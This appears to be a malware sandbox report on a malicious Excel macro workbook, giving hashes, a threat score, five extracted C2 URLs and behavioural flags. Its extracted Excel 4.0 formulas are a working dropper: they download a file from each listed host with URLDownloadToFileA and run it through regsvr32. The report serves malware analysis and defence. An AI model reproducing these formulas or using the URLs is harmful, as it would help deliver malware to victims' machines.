Overview

overview

10

Static

static

10

7ac32d506f...c.xlsm

windows7-x64

10

7ac32d506f...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

  • Size

    90KB

  • Sample

    241120-2pfjdszkcn

  • MD5

    b4cf8a517aa0695ee3ee1b49510bdd09

  • SHA1

    ef326a415f65d08d2ac500330df76e55945764b5

  • SHA256

    7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

  • SHA512

    1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af

  • SSDEEP

    1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

http://www.beholdpublications.com/home/BABxyyWZx8Vu/

http://explorationit.com/screwing/AxLm/

http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/

http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0) =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

Targets

    • Target

      7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

    • Size

      90KB

    • MD5

      b4cf8a517aa0695ee3ee1b49510bdd09

    • SHA1

      ef326a415f65d08d2ac500330df76e55945764b5

    • SHA256

      7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

    • SHA512

      1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af

    • SSDEEP

      1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks